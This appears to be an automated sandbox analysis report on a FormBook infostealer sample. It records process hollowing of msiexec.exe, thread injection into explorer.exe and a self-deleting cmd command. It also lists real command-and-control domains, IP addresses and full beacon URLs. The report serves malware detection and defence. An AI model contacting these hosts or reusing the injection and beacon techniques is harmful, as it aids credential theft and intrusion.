          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043D4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0443A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04488D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04468DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043D3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0446B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0446B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04488A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0446FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0446FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043EFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04488ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0444FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_044346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04480EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04480EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04480EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04488B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04488F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0448070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0448070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0444FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0444FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0447131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043EB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0446D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0447138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04437794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04437794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04437794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04485BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.surivaganza.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.5.43.61 80
          Source: C:\Windows\explorer.exeDomain query: www.oikoschain.com
          Source: C:\Windows\explorer.exeDomain query: www.matcitekids.com
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.248.20 80
          Source: C:\Windows\explorer.exeDomain query: www.chaneabond.com
          Source: C:\Windows\explorer.exeDomain query: www.extinctionbrews.com
          Source: C:\Windows\explorer.exeDomain query: www.monsoonnerd.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.254 80
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.238.189 80
          Source: C:\Windows\explorer.exeDomain query: www.melodezu.com
          Source: C:\Windows\explorer.exeDomain query: www.tinsley.website
          Source: C:\Windows\explorer.exeNetwork Connect: 64.227.87.162 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.mydreamtv.net
          Source: C:\Windows\explorer.exeDomain query: www.cajunseafoodstcloud.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeSection loaded: unknown target: C:\Users\user\Desktop\wREFu91LXZ.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 80000
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeProcess created: C:\Users\user\Desktop\wREFu91LXZ.exe 'C:\Users\user\Desktop\wREFu91LXZ.exe'
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\wREFu91LXZ.exe'
          Source: explorer.exe, 00000005.00000000.232284109.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.261365308.0000000001980000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.247668679.000000000871F000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.261365308.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.261365308.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1DLL Side-Loading1Process Injection512Virtualization/Sandbox Evasion2OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection512LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSystem Information Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452405 Sample: wREFu91LXZ.exe Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 34 www.wthcoffee.com 2->34 36 www.avito-payment.life 2->36 38 wthcoffee.com 2->38 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 4 other signatures 2->48 11 wREFu91LXZ.exe 2->11         started        signatures3 process4 signatures5 56 Detected unpacking (changes PE section rights) 11->56 58 Maps a DLL or memory area into another process 11->58 60 Tries to detect virtualization through RDTSC time measurements 11->60 14 wREFu91LXZ.exe 11->14         started        process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 Queues an APC in another process (thread injection) 14->68 17 explorer.exe 14->17 injected process8 dnsIp9 28 tinsley.website 50.87.238.189, 49741, 80 UNIFIEDLAYER-AS-1US United States 17->28 30 matcitekids.com 50.87.248.20, 49743, 80 UNIFIEDLAYER-AS-1US United States 17->30 32 14 other IPs or domains 17->32 40 System process connects to network (likely due to code injection or exploit) 17->40 21 msiexec.exe 17->21         started        signatures10 process11 signatures12 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          wREFu91LXZ.exe32%VirustotalBrowse
          wREFu91LXZ.exe54%ReversingLabsWin32.Trojan.VirRansom
          wREFu91LXZ.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.2.msiexec.exe.48c7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          10.2.msiexec.exe.22b358.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.wREFu91LXZ.exe.21a0000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.wREFu91LXZ.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.1.wREFu91LXZ.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.wREFu91LXZ.exe.680000.1.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.cajunseafoodstcloud.com/dy8g/?9rrLUp1=sC7FhjJqcCFIEoUuEobIBnrRYwOZzG9nc/x6jFk5Keq5TgsKgOpKFfaz6JoBJPzzv7cu&sxlxj=RL30W0%Avira URL Cloudsafe
          http://www.tinsley.website/dy8g/?9rrLUp1=iVPDfBhYBy5JvywJlu7/jTaNaIK/WCHUrbFXeojMH/nMVdHPbpxjQuq5aGN6jhO1pTuT&sxlxj=RL30W0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.matcitekids.com/dy8g/?9rrLUp1=dI9eO6GEnVuhhF2IZBGZI9CJMc/scmM0Fs5NmUifzPq1VUdHCmcaYQjC6cJJVTF2eMwa&sxlxj=RL30W0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.extinctionbrews.com/dy8g/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.extinctionbrews.com/dy8g/?9rrLUp1=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoFjnAjbDmWUu&sxlxj=RL30W0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.chaneabond.com/dy8g/?9rrLUp1=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6ShLP6A0B+d4&sxlxj=RL30W0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.melodezu.com/dy8g/?9rrLUp1=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpA7pfREgQYT&sxlxj=RL30W0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          matcitekids.com
          50.87.248.20
          truetrue
            unknown
            extinctionbrews.com
            34.102.136.180
            truefalse
              unknown
              www.surivaganza.com
              217.160.0.254
              truetrue
                unknown
                tinsley.website
                50.87.238.189
                truetrue
                  unknown
                  cajunseafoodstcloud.com
                  52.5.43.61
                  truetrue
                    unknown
                    ext-sq.squarespace.com
                    198.185.159.144
                    truefalse
                      high
                      melodezu.com
                      64.227.87.162
                      truetrue
                        unknown
                        wthcoffee.com
                        184.168.131.241
                        truetrue
                          unknown
                          www.wthcoffee.com
                          unknown
                          unknowntrue
                            unknown
                            www.avito-payment.life
                            unknown
                            unknowntrue
                              unknown
                              www.oikoschain.com
                              unknown
                              unknowntrue
                                unknown
                                www.melodezu.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.tinsley.website
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.matcitekids.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.mydreamtv.net
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.chaneabond.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.extinctionbrews.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.monsoonnerd.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.cajunseafoodstcloud.com
                                              unknown
                                              unknowntrue
                                                unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.cajunseafoodstcloud.com/dy8g/?9rrLUp1=sC7FhjJqcCFIEoUuEobIBnrRYwOZzG9nc/x6jFk5Keq5TgsKgOpKFfaz6JoBJPzzv7cu&sxlxj=RL30Wtrue
                                                • Avira URL Cloud: safe
                                                unknown
